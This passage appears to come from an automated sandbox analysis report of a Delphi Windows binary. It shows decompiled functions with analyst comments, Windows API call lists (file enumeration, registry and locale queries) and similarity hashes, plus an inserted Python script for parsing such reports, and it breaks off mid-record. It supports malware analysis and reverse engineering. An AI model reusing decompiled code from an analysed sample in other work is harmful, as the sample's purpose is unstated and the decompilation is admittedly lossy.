                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fd7c348ce77f50c17542cebb3b0538e5ca6a1de9245a361f45dd7a6b294aa538
                                                            • Instruction ID: 101897594dce54360dc52a275b3a014dbc9cabf376d6d76c5a5bbcf91f550c41
                                                            • Opcode Fuzzy Hash: fd7c348ce77f50c17542cebb3b0538e5ca6a1de9245a361f45dd7a6b294aa538
                                                            • Instruction Fuzzy Hash: 53218830B045096FCB04EF65CC8299F77A9EB84304B60447FB801B77C2DA78EE058B55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 56%
                                                            			E00404DE0(char __eax, signed int __ebx) {
                                                            				// The control flow matches the Delphi RTL ForceDirectories pattern (an
                                                            				// inference from the structure, the report does not name it): strip the
                                                            				// trailing delimiter, stop for paths shorter than 3 chars or that already
                                                            				// exist (E00404CF8; this function's API ID is AttributesFile), otherwise
                                                            				// recurse on the parent path and then create the directory itself.
                                                            				void* _v8;
                                                            				char _v12;
                                                            				void* _v16;
                                                            				char _v20;
                                                            				void* _t45;
                                                            				intOrPtr _t55;
                                                            				intOrPtr _t64;
                                                            				void* _t65;
                                                            				void* _t68;
                                                            
                                                            				_push(0); // four zeroed string slots for the finally block
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(__ebx);
                                                            				_v8 = __eax;                       // directory path
                                                            				E004033FC(_v8);
                                                            				_push(_t64);
                                                            				_push(0x404e9f);                   // SEH frame, finally handler at 0x404e9f
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t64;
                                                            				_t65 = E0040320C(_v8);             // string length
                                                            				_t49 = __ebx & 0xffffff00 | _t65 > 0x00000000;   // setnz bl: result flag = (length > 0)
                                                            				if((__ebx & 0xffffff00 | _t65 > 0x00000000) != 0) {
                                                            					E00404DCC(_v8,  &_v12);         // presumably strips the trailing path delimiter into _v12
                                                            					E0040312C( &_v8, _v12);         // _v8 := _v12
                                                            					if(E0040320C(_v8) >= 3) {       // a 1- or 2-char path (drive root) is left alone
                                                            						_t68 = E00404CF8(_v8);      // does the directory exist? (file-attribute lookup)
                                                            						if(_t68 == 0) {
                                                            							E00404EEC( &_v16);      // presumably the parent path of _v8
                                                            							E00403358(_v16, _v8);   // compare it with _v8
                                                            							if(_t68 != 0) {         // decompiler reused _t68 for the compare result: parent differs from path
                                                            								E00404EEC( &_v20);
                                                            								_t45 = E00404DE0(_v20, _t49); // executed   // recurse on the parent
                                                            								if(_t45 == 0 || E00404EB0(_v8) == 0) {      // then create _v8; the result flag is dropped by the decompiler
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				_pop(_t55);
                                                            				 *[fs:eax] = _t55;                 // unlink the SEH frame
                                                            				_push(E00404EA6);
                                                            				return E004030B8( &_v20, 4);       // finally: release the four string locals
                                                            			}

                                                            Instruction addresses of the listing above (one per decompiled line): 0x00404de5 to 0x00404e9e

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 60dcf029e418bb4de6c98b25837b89894300ef75002f4660ff180e9b0e990edb
                                                            • Instruction ID: 1dfd328e9d81c806f2c03a8771cfa584465e3ed9e3942cc4fd01b0b075e0960a
                                                            • Opcode Fuzzy Hash: 60dcf029e418bb4de6c98b25837b89894300ef75002f4660ff180e9b0e990edb
                                                            • Instruction Fuzzy Hash: 712106B4600209EFDF00EFA5C94299EB7B8FF85304B5045BABA04B72D1D778AF04D658
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 37%
                                                            			E00406E94(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                            				// Builds a string from __ecx plus an 11-byte constant, hands it to E00404C78
                                                            				// together with an 8-byte output buffer, and on success compares the loaded
                                                            				// value as a floating-point number with the constant at 0x406f30. This
                                                            				// function's API ID is LocalPathTempTime, so the temp-path and local-time
                                                            				// APIs are reached from here. Nothing consumes the fcomp result in the
                                                            				// decompiled output: the decompiler dropped the branch that followed it.
                                                            				char _v12;
                                                            				char _v16;
                                                            				char _v20;
                                                            				intOrPtr* _t20;
                                                            				void* _t24;
                                                            				intOrPtr _t40;
                                                            				void* _t46;
                                                            
                                                            				_push(__ebx);
                                                            				_v16 = 0;
                                                            				_v20 = 0;
                                                            				_push(_t46);
                                                            				_push(0x406f22);                   // SEH frame, finally handler at 0x406f22
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t46 + 0xfffffff0;
                                                            				E00405008( &_v16, 1, __ecx);       // _v16 built from __ecx
                                                            				_push( &_v16);
                                                            				E004031F4( &_v20, 0xb, 0x40919c);  // _v20 = 11-byte string constant at 0x40919c
                                                            				_pop(_t20);
                                                            				E00403214(_t20, _v20);             // _v16 := _v16 + _v20
                                                            				_t24 = E00404C78(E0040340C(_v16), 1, 8,  &_v12, __edi, __esi); // executed   // _v16 as PChar, the values 1 and 8, 8-byte buffer _v12
                                                            				if(_t24 != 0) {
                                                            					E004057D8(__fp0);               // load the 8-byte value onto the FPU stack
                                                            					asm("fcomp dword [0x406f30]");  // compare with the 4-byte float constant at 0x406f30
                                                            					asm("fnstsw ax");
                                                            					asm("sahf");                    // flags set, but no consumer survives decompilation
                                                            				}
                                                            				_pop(_t40);
                                                            				 *[fs:eax] = _t40;                 // unlink the SEH frame
                                                            				_push(E00406F29);
                                                            				return E004030B8( &_v20, 2);       // finally: release _v20 and _v16
                                                            			}

                                                            Instruction addresses of the listing above (one per decompiled line): 0x00406e9a to 0x00406f21

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LocalPathTempTime
                                                            • String ID:
                                                            • API String ID: 2118298429-0
                                                            • Opcode ID: be31c71bef31dcf0d495f0e1e2d88fef08ea193925f7f09ef08642d0a6e869a3
                                                            • Instruction ID: 68f96da1d51e9565b10b5108b435a8bc67f0bfec9723d228dfcbae9d3fbb17ab
                                                            • Opcode Fuzzy Hash: be31c71bef31dcf0d495f0e1e2d88fef08ea193925f7f09ef08642d0a6e869a3
                                                            • Instruction Fuzzy Hash: 4A0175709042099FDB00EFA5DC5159FB7BDFB45300F52857BE414F36C5DB38AA148A69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004052AC(void* __eax, void* __ecx, void* __edx) {
                                                            				// Directory listing helper called from E004074B4 as E004052AC(path, 0, mask):
                                                            				// creates an object of the class whose VMT pointer sits at 0x40447c, has
                                                            				// E00405634 populate it by scanning path __eax (this function's API ID is
                                                            				// FileFind$FirstNext, i.e. FindFirstFile/FindNextFile) and returns the object.
                                                            				void* __esi;
                                                            				void* _t7;
                                                            				intOrPtr _t11;
                                                            				void* _t14;
                                                            
                                                            				_t14 = __eax;                      // path to enumerate
                                                            				_t11 =  *0x40447c; // 0x404488     // class reference (VMT at 0x404488)
                                                            				_t7 = E004044F8(_t11, 0);          // instantiate the list object
                                                            				E00405634(_t7, __edx, _t14, _t14, 0, __ecx); // executed   // fill it; __edx and __ecx are the caller's mask and flag
                                                            				return _t7;
                                                            			}

                                                            Instruction addresses of the listing above (one per decompiled line): 0x004052b4 to 0x004052d7

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileFind$FirstNext
                                                            • String ID:
                                                            • API String ID: 1690352074-0
                                                            • Opcode ID: 4f493d9307b3d4b817a7e836544abeb962cbb198da26cb643227803e88156b29
                                                            • Instruction ID: b59b8e1bf290491f0b5bd01f3f1f1884d5f58955f35eb0aac9512fedb03d6d3a
                                                            • Opcode Fuzzy Hash: 4f493d9307b3d4b817a7e836544abeb962cbb198da26cb643227803e88156b29
                                                            • Instruction Fuzzy Hash: 70D0A76230111417870065BF2C84C2BF3CDCBCD565391413AB208D7341DD35AC0742B8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
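Each function block in this listing carries a Similarity record (an API ID such as FileFind$FirstNext, an Opcode ID, opcode and instruction fuzzy hashes) and a decompiled body whose callees are the E-prefixed function names. As an added example that is not part of the report or of the sample's code, the Python below parses those blocks from report text, recovers the call graph between E-functions, flags self-recursive functions (E004074B4 and E00404DE0 above both call themselves) and answers which functions carry a given API family. The input is an excerpt constructed from the blocks on this page with layout whitespace removed; the "C-Code - Quality" header and the bullet field names are taken from the page, while the record class and helper names are the example's own.

```python
# Added example, not code from the report or the sample: index the per-function
# metadata of a Joe Sandbox-style listing and recover the E-function call graph.
import re
from dataclasses import dataclass, field

# Constructed excerpt: values copied from the blocks above, bodies trimmed to
# the lines that carry calls, layout whitespace and link text removed.
SAMPLE_REPORT = """\
C-Code - Quality: 60%
E004074B4(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
    _t49 = E004052AC(_v8, 0, _v12);
    E004071D0(_v24, _t49, _t72, _t74); // executed
    E004074B4(_v16, _t49, _t72, _t74, _t81, _a4); // executed
    return E004030B8( &_v28, 6);
}
Similarity
• API ID:
• Instruction Fuzzy Hash: 53218830B045096FCB04EF65CC8299F77A9EB84304B60447FB801B77C2DA78EE058B55
C-Code - Quality: 56%
E00404DE0(char __eax, signed int __ebx) {
    _t65 = E0040320C(_v8);
    _t45 = E00404DE0(_v20, _t49); // executed
    return E004030B8( &_v20, 4);
}
Similarity
• API ID: AttributesFile
• Instruction Fuzzy Hash: 712106B4600209EFDF00EFA5C94299EB7B8FF85304B5045BABA04B72D1D778AF04D658
C-Code - Quality: 100%
E004052AC(void* __eax, void* __ecx, void* __edx) {
    _t7 = E004044F8(_t11, 0);
    E00405634(_t7, __edx, _t14, _t14, 0, __ecx); // executed
    return _t7;
}
Similarity
• API ID: FileFind$FirstNext
• Instruction Fuzzy Hash: 70D0A76230111417870065BF2C84C2BF3CDCBCD565391413AB208D7341DD35AC0742B8
"""

HEADER_RE = re.compile(r"^C-Code - Quality:\s*(\d+)%")
SIGNATURE_RE = re.compile(r"^(E[0-9A-F]{8})\(")
FIELD_RE = re.compile(r"^•\s*(API ID|Opcode ID|Instruction Fuzzy Hash):\s*(.*)$")
CALL_RE = re.compile(r"\b(E[0-9A-F]{8})\(")


@dataclass
class FunctionRecord:
    name: str
    quality: int                      # decompiler confidence from the header
    fields: dict = field(default_factory=dict)
    callees: set = field(default_factory=set)

    @property
    def api_tokens(self):
        # "FileFind$FirstNext" -> ["FileFind", "FirstNext"]; an empty API ID -> []
        return [t for t in self.fields.get("API ID", "").split("$") if t]

    @property
    def is_recursive(self):
        return self.name in self.callees


def parse_report(text):
    """A signature right after a quality header opens a record; body calls
    and Similarity bullets attach to the most recent record."""
    records, current, pending_quality = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if m := HEADER_RE.match(line):
            pending_quality = int(m.group(1))
            continue
        if (m := SIGNATURE_RE.match(line)) and pending_quality is not None:
            current = FunctionRecord(m.group(1), pending_quality)
            records.append(current)
            pending_quality = None
            continue
        if current is None:
            continue
        if m := FIELD_RE.match(line):
            current.fields[m.group(1)] = m.group(2).strip()
        else:
            current.callees.update(CALL_RE.findall(line))
    return records


def functions_using(records, api_fragment):
    """Functions whose API ID mentions api_fragment, e.g. "FileFind"."""
    return [r.name for r in records if any(api_fragment in t for t in r.api_tokens)]


def recursive_functions(records):
    return [r.name for r in records if r.is_recursive]


def callers_of(records, target):
    return [r.name for r in records if target in r.callees]


if __name__ == "__main__":
    recs = parse_report(SAMPLE_REPORT)
    for r in recs:
        print(r.name, f"{r.quality}%", r.api_tokens, r.is_recursive, sorted(r.callees))
    print("FindFirst/FindNext users:", functions_using(recs, "FileFind"))
    print("callers of E004052AC:", callers_of(recs, "E004052AC"))
```

Run against a full report export, `callers_of` links the FindFirst/FindNext list builder to every function that walks with it, and `recursive_functions` singles out tree walkers such as E004074B4 without reading each body; the fuzzy-hash fields can be indexed the same way to spot near-duplicate functions across samples.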

                                                            C-Code - Quality: 37%
                                                            			E00402448(void* __eax) {
                                                            				// Allocator wrapper: a non-positive size yields a null pointer; otherwise the
                                                            				// import at 0x409030 is called and a null result raises runtime error 1 via
                                                            				// E00402530. That sequence matches Delphi's GetMem raising
                                                            				// Error(reOutOfMemory), where reOutOfMemory = 1; the identification is an
                                                            				// inference from the pattern, the report does not name the routine.
                                                            				void* _t3;
                                                            				void* _t6;
                                                            
                                                            				if(__eax <= 0) {
                                                            					_t6 = 0;
                                                            				} else {
                                                            					_t3 =  *0x409030(); // executed   // indirect call through the import slot at 0x409030, size in eax
                                                            					_t6 = _t3;
                                                            					if(_t6 == 0) {
                                                            						E00402530(1);               // out-of-memory runtime error
                                                            					}
                                                            				}
                                                            				return _t6;
                                                            			}

                                                            Instruction addresses of the listing above (one per decompiled line): 0x0040244b to 0x00402467

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8dfeac06a829af607fe89a8817dc8f9230199d36438cef303ac21605a03e7c3b
                                                            • Instruction ID: d53205a698bee5913c9905fe3b2fa7a5b2040cee35667c8cc0b5dc0e3ef69e66
                                                            • Opcode Fuzzy Hash: 8dfeac06a829af607fe89a8817dc8f9230199d36438cef303ac21605a03e7c3b
                                                            • Instruction Fuzzy Hash: 6AC08C6030270387DB202AFA1FDC113125C3F24205300403BA901F13D3EAF8CD089A2F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00406510(void* __eax, void* __edx) {
                                                            				void* _t3;
                                                            				void* _t4;
                                                            				void* _t8;
                                                            				void* _t9;
                                                            				intOrPtr* _t10;
                                                            
                                                            				_t3 = E00406B48(_t10, _t4, __edx, 0, _t8, _t9); // executed
                                                            				return _t3;
                                                            			}

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: IconInfo
                                                            • String ID:
                                                            • API String ID: 2096194817-0
                                                            • Opcode ID: 3aa0d1c17f7541c88f4a23eede43810dced38d8a94ff8caad404287aac718eb2
                                                            • Instruction ID: 2c83cf8f1268621ffc1ea80895ab672af1bae2362a1aae74aa6b220125402c61
                                                            • Opcode Fuzzy Hash: 3aa0d1c17f7541c88f4a23eede43810dced38d8a94ff8caad404287aac718eb2
                                                            • Instruction Fuzzy Hash: 92A002C6751214079B4CE53F1C6292A729F07C8615759C87A7906DA289CD38E8512155
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            APIs
                                                              • Part of subcall function 0040C2A0: GetKeyboardType.USER32(00000000), ref: 0040C2A5
                                                              • Part of subcall function 0040C2A0: GetKeyboardType.USER32(00000001), ref: 0040C2B1
                                                            • GetCommandLineA.KERNEL32 ref: 0040D87B
                                                            • GetVersion.KERNEL32 ref: 0040D88F
                                                            • GetVersion.KERNEL32 ref: 0040D8A0
                                                            • GetCurrentThreadId.KERNEL32 ref: 0040D8DC
                                                              • Part of subcall function 0040C2D0: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C2F2
                                                              • Part of subcall function 0040C2D0: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C325
                                                              • Part of subcall function 0040C2D0: RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C33B
                                                            • GetThreadLocale.KERNEL32 ref: 0040D8BC
                                                              • Part of subcall function 0040D74C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 0040D772
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp
• Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                            • String ID:
                                                            • API String ID: 3734044017-0
                                                            • Opcode ID: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                            • Instruction ID: 917de0a484455ad82c20158439a2a24f06621c5804a29fc775aa2cf17b207d74
                                                            • Opcode Fuzzy Hash: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                            • Instruction Fuzzy Hash: F10129B1C113449AE711BFB1AA463193A60AB1130CF10857FD151762E2EB7D00A8DB6F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000), ref: 0040F16D
                                                            • FindNextFileA.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 0040F1CF
                                                            • FindClose.KERNEL32(00000000,00000000,?,?,?,00000000,00000000), ref: 0040F1D9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp
• Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 3541575487-438819550
                                                            • Opcode ID: 1eb9b05f6550193698417fdfd1abd8b4f720dd67f104cddbbfc16bbf0ec42b4c
                                                            • Instruction ID: 21f552544a71644aa5a29d04448db43bc273ae507e021618840bae1d7485b843
                                                            • Opcode Fuzzy Hash: 1eb9b05f6550193698417fdfd1abd8b4f720dd67f104cddbbfc16bbf0ec42b4c
                                                            • Instruction Fuzzy Hash: C431B071704100ABDB15AB66D88286B37A9DF86328720457FF804EF6C7DA7CDC1A8699
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000), ref: 0040F16D
                                                            • FindNextFileA.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 0040F1CF
                                                            • FindClose.KERNEL32(00000000,00000000,?,?,?,00000000,00000000), ref: 0040F1D9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp
• Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 3541575487-438819550
                                                            • Opcode ID: ca5e68894038c338b17cd596c0991537003cad852163082c19a1be6d7e7f9c81
                                                            • Instruction ID: 271996e333eb2d0f8e3e23676571f4307960fb9fe6b8e39aca4bbd563d4a420a
                                                            • Opcode Fuzzy Hash: ca5e68894038c338b17cd596c0991537003cad852163082c19a1be6d7e7f9c81
                                                            • Instruction Fuzzy Hash: 1031C171700100ABDB14EF67D88286B369ADF85328720457FF804EF6C7EA7CDC0A8699
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,Function_000051DB), ref: 0040EBD3
                                                            • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040EC33
                                                            • FindClose.KERNEL32(00000000,00000000,00000010), ref: 0040EC43
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp
• Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: 4092cce72e1492469b29ed450f25109bd7218eb8d29261f7a9cbb69d7287a135
                                                            • Instruction ID: c0991531ddac9e0079019e73ada339c648f4459b5552238d600e3526c74abf5e
                                                            • Opcode Fuzzy Hash: 4092cce72e1492469b29ed450f25109bd7218eb8d29261f7a9cbb69d7287a135
                                                            • Instruction Fuzzy Hash: 24412C30904618DBDB21EBA6C885BDEB7B5EF48308F5045FAA404B7291D73CAE45DE58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000), ref: 0040F16D
                                                            • FindNextFileA.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 0040F1CF
                                                            • FindClose.KERNEL32(00000000,00000000,?,?,?,00000000,00000000), ref: 0040F1D9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp
• Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: f55870f158cee9a1d6f18cde8792f83b73ebd952d8db967ab993b5bc452fad5b
                                                            • Instruction ID: daf054dd685538e10cf0cfb88bdb67cc68ef1b402af78a2ce0ba985ddb15a516
                                                            • Opcode Fuzzy Hash: f55870f158cee9a1d6f18cde8792f83b73ebd952d8db967ab993b5bc452fad5b
                                                            • Instruction Fuzzy Hash: 44119371704100ABDA15AB27DC8296B365ADFC5364B10493FF809EF2C6DA3DDC0A8699
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,Function_000051DB), ref: 0040EBD3
                                                            • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040EC33
                                                            • FindClose.KERNEL32(00000000,00000000,00000010), ref: 0040EC43
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp
• Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: 48372c018bd84101f49dc516bbf45a6ced4abc977314169db57e5ea29c748e96
                                                            • Instruction ID: 9a129490767a9822db482bfa393921b2fcf1aa7a937d9a2231ce8cb683432473
                                                            • Opcode Fuzzy Hash: 48372c018bd84101f49dc516bbf45a6ced4abc977314169db57e5ea29c748e96
                                                            • Instruction Fuzzy Hash: 9A310C30D04608EFDB11EBA6C886A9EB7B5EF48304F5045FAA405B73D1D778AF45CA58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FindFirstFileA.KERNEL32(?), ref: 0040EA0C
                                                            • FindClose.KERNEL32(00000000,?), ref: 0040EA16
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp
• Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: 02548c725d9e45131fd1c362ffdfc86aac1187def22e8373c54bf7181a1369e7
                                                            • Instruction ID: 6a2226afb0a8b14f7d31ab3cf4cdd30a4af029b65c76461fbe821aedbeee1211
                                                            • Opcode Fuzzy Hash: 02548c725d9e45131fd1c362ffdfc86aac1187def22e8373c54bf7181a1369e7
                                                            • Instruction Fuzzy Hash: 78C08C64E081402BC80023B6CC0282B3008FA84348F840926759BF22C2D93E89248A6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 51%
                                                            			E00403CB4(int __eax, void* __ebx, void* __eflags) {
                                                            				char _v8;
                                                            				char _v15;
                                                            				char _v20;
                                                            				intOrPtr _t29;
                                                            				void* _t32;
                                                            
                                                            				_v20 = 0;
                                                            				_push(_t32);
                                                            				_push(0x403d1a);
                                                            				_push( *[fs:edx]);
                                                            				 *[fs:edx] = _t32 + 0xfffffff0;
                                                            				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
                                                            				E004031F4( &_v20, 7,  &_v15);
                                                            				E0040269C(_v20,  &_v8);
                                                            				if(_v8 != 0) {
                                                            				}
                                                            				_pop(_t29);
                                                            				 *[fs:eax] = _t29;
                                                            				_push(E00403D21);
                                                            				return E00403094( &_v20);
                                                            			}

                                                            APIs
                                                            • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 00403CDA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID:
                                                            • API String ID: 2299586839-0
                                                            • Opcode ID: f7943df5f697ff604979ede478dc829ce2ae39317294e6d377f4d43c8f2bc4e7
                                                            • Instruction ID: 6d3425cb13dc4e10e5c99e835ecbf0d9b5a709cf75aacf138b47c3a7ed30a7d1
                                                            • Opcode Fuzzy Hash: f7943df5f697ff604979ede478dc829ce2ae39317294e6d377f4d43c8f2bc4e7
                                                            • Instruction Fuzzy Hash: DDF0C830904209AFEB04DFA2CC42ADEF77EFB88714F10887AA110675C0EBB82B04C648
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 0040D772
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp
• Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID:
                                                            • API String ID: 2299586839-0
                                                            • Opcode ID: 226d36a3a2a6d126d7b518791991f6729a36aae8a22c2ca38394135d70b07227
                                                            • Instruction ID: 7765dcfaf0ac3467b05695104e180fa3b916594c574afae56f7b81e2f936b299
